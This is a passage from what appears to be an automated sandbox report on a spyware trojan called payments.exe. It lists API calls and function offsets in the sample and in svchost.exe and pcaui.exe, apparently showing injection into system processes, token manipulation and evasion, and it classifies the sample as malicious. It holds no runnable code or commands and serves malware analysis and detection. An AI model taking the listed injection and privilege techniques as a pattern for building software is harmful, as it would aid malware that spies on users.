                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632AB0 NtWaitForSingleObject,4_2_04632AB0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632B80 NtQueryInformationFile,4_2_04632B80
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04633010 NtOpenDirectoryObject,4_2_04633010
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04633090 NtSetValueKey,4_2_04633090
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04633D70 NtOpenThread,4_2_04633D70
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04633D10 NtOpenProcessToken,4_2_04633D10
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026C9630 NtReadFile,4_2_026C9630
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026C9720 NtDeleteFile,4_2_026C9720
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026C97D0 NtClose,4_2_026C97D0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026C94C0 NtCreateFile,4_2_026C94C0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026C9940 NtAllocateVirtualMemory,4_2_026C9940
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CD6685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00CD6685
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CCACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00CCACC5
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CD79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00CD79D3
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CBB0430_2_00CBB043
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CA32000_2_00CA3200
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CA3B700_2_00CA3B70
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CC410F0_2_00CC410F
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB02A40_2_00CB02A4
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CC038E0_2_00CC038E
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00C9E3B00_2_00C9E3B0
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB06D90_2_00CB06D9
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CC467F0_2_00CC467F
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CFAACE0_2_00CFAACE
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CC4BEF0_2_00CC4BEF
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CBCCC10_2_00CBCCC1
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00C9AF500_2_00C9AF50
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00C96F070_2_00C96F07
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CBD1B90_2_00CBD1B9
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CF31BC0_2_00CF31BC
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CAB11F0_2_00CAB11F
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CC724D0_2_00CC724D
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB123A0_2_00CB123A
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CD13CA0_2_00CD13CA
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00C993F00_2_00C993F0
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CAF5630_2_00CAF563
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CDB6CC0_2_00CDB6CC
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00C996C00_2_00C996C0
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CFF7FF0_2_00CFF7FF
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00C977B00_2_00C977B0
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CC79C90_2_00CC79C9
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CAFA570_2_00CAFA57
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00C99B600_2_00C99B60
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00C97D190_2_00C97D19
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB9ED00_2_00CB9ED0
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CAFE6F0_2_00CAFE6F
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00C97FA30_2_00C97FA3
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_010AE3500_2_010AE350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004187F32_2_004187F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100232_2_00410023
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011402_2_00401140
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004169F32_2_004169F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004102432_2_00410243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E2232_2_0040E223
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3672_2_0040E367
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3732_2_0040E373
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025D02_2_004025D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E102_2_00402E10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EED32_2_0042EED3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA3522_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038003E62_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F02_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E02742_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C02C02_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C81582_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038001AA2_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA1182_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037301002_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F81CC2_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F41A22_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D20002_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037407702_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037647502_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C02_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C6E02_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038005912_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037405352_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F24462_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E44202_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EE4F62_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB402_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F6BD72_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA802_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037569622_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380A9A62_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A02_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374A8402_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037428402_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E8F02_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037268B82_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F402_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760F302_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E2F302_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03782F282_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE02_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732FC82_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BEFA02_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740E592_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEE262_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEEDB2_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752E902_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FCE932_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DCD1F2_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374AD002_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373ADE02_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03758DBF2_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740C002_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730CF22_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0CB52_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372D34C2_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F132D2_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0378739A2_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E12ED2_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B2C02_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037452A02_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372F1722_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377516C2_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374B1B02_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380B16B2_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F70E92_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF0E02_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EF0CC2_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037470C02_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF7B02_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037856302_2_03785630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F16CC2_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F75712_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038095C32_2_038095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DD5B02_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037314602_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF43F2_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFB762_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B5BF02_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377DBF92_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FB802_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B3A6C2_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFA492_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7A462_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EDAC62_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DDAAC2_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03785AA02_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E1AA32_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037499502_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B9502_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D59102_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AD8002_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037438E02_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFF092_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703FD22_2_03703FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703FD52_2_03703FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFFB12_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03741F922_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03749EB02_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7D732_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F1D5A2_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03743D402_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FDC02_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B9C322_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFCF22_2_037FFCF2
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03980C443_2_03980C44
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03982A9C3_2_03982A9C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_039A194C3_2_039A194C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03980DEC3_2_03980DEC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03982CBC3_2_03982CBC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03980CBF3_2_03980CBF
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_0398946C3_2_0398946C
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B24464_2_046B2446
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046A44204_2_046A4420
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046AE4F64_2_046AE4F6
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046005354_2_04600535
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046C05914_2_046C0591
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0461C6E04_2_0461C6E0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046007704_2_04600770
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046247504_2_04624750
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045FC7C04_2_045FC7C0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046920004_2_04692000
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046881584_2_04688158
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045F01004_2_045F0100
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0469A1184_2_0469A118
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B81CC4_2_046B81CC
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046C01AA4_2_046C01AA
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B41A24_2_046B41A2
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046A02744_2_046A0274
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046802C04_2_046802C0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BA3524_2_046BA352
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046C03E64_2_046C03E6
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0460E3F04_2_0460E3F0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04600C004_2_04600C00
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045F0CF24_2_045F0CF2
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046A0CB54_2_046A0CB5
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0460AD004_2_0460AD00
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0469CD1F4_2_0469CD1F
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045FADE04_2_045FADE0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04618DBF4_2_04618DBF
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04600E594_2_04600E59
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BEE264_2_046BEE26
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BEEDB4_2_046BEEDB
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04612E904_2_04612E90
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BCE934_2_046BCE93
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04674F404_2_04674F40
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04642F284_2_04642F28
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04620F304_2_04620F30
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046A2F304_2_046A2F30
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0460CFE04_2_0460CFE0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045F2FC84_2_045F2FC8
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0467EFA04_2_0467EFA0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0460A8404_2_0460A840
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046028404_2_04602840
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0462E8F04_2_0462E8F0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045E68B84_2_045E68B8
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046169624_2_04616962
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046029A04_2_046029A0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046CA9A64_2_046CA9A6
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045FEA804_2_045FEA80
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BAB404_2_046BAB40
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B6BD74_2_046B6BD7
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045F14604_2_045F1460
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BF43F4_2_046BF43F
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B75714_2_046B7571
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046C95C34_2_046C95C3
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0469D5B04_2_0469D5B0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046456304_2_04645630
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B16CC4_2_046B16CC
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BF7B04_2_046BF7B0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B70E94_2_046B70E9
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BF0E04_2_046BF0E0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046070C04_2_046070C0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046AF0CC4_2_046AF0CC
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046CB16B4_2_046CB16B
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0463516C4_2_0463516C
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045EF1724_2_045EF172
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0460B1B04_2_0460B1B0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046A12ED4_2_046A12ED
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0461B2C04_2_0461B2C0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046052A04_2_046052A0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045ED34C4_2_045ED34C
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B132D4_2_046B132D
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0464739A4_2_0464739A
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04679C324_2_04679C32
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BFCF24_2_046BFCF2
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B7D734_2_046B7D73
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04603D404_2_04603D40
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B1D5A4_2_046B1D5A
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0461FDC04_2_0461FDC0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04609EB04_2_04609EB0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BFF094_2_046BFF09
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045C3FD54_2_045C3FD5
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045C3FD24_2_045C3FD2
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BFFB14_2_046BFFB1
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04601F924_2_04601F92
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0466D8004_2_0466D800
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046038E04_2_046038E0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046099504_2_04609950
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0461B9504_2_0461B950
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046959104_2_04695910
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04673A6C4_2_04673A6C
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BFA494_2_046BFA49
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B7A464_2_046B7A46
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046ADAC64_2_046ADAC6
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04645AA04_2_04645AA0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0469DAAC4_2_0469DAAC
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046A1AA34_2_046A1AA3
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BFB764_2_046BFB76
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04675BF04_2_04675BF0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0463DBF94_2_0463DBF9
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0461FB804_2_0461FB80
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026B20804_2_026B2080
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026ACF604_2_026ACF60
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026AB2A44_2_026AB2A4
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026AB2B04_2_026AB2B0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026AB1604_2_026AB160
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026AD1804_2_026AD180
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026B57304_2_026B5730
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026B39304_2_026B3930
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026CBE104_2_026CBE10
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_044CE6DC4_2_044CE6DC
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_044CE2C84_2_044CE2C8
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_044CE3E44_2_044CE3E4
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_044CD8484_2_044CD848
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_044CD8134_2_044CD813
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_044CCAE84_2_044CCAE8
                Source: C:\Users\user\Desktop\payments.exeCode function: String function: 00CB6AC0 appears 42 times
                Source: C:\Users\user\Desktop\payments.exeCode function: String function: 00CBF8A0 appears 35 times
                Source: C:\Users\user\Desktop\payments.exeCode function: String function: 00CAEC2F appears 68 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 110 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 04635130 appears 58 times
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 0467F290 appears 105 times
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 045EB970 appears 280 times
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 0466EA12 appears 86 times
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 04647E54 appears 110 times
                Source: payments.exe, 00000000.00000003.1350154927.0000000003AED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs payments.exe
                Source: payments.exe, 00000000.00000003.1357005874.0000000003993000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs payments.exe
                Source: payments.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@19/15
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CDCE7A GetLastError,FormatMessageW,0_2_00CDCE7A
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CCAB84 AdjustTokenPrivileges,CloseHandle,0_2_00CCAB84
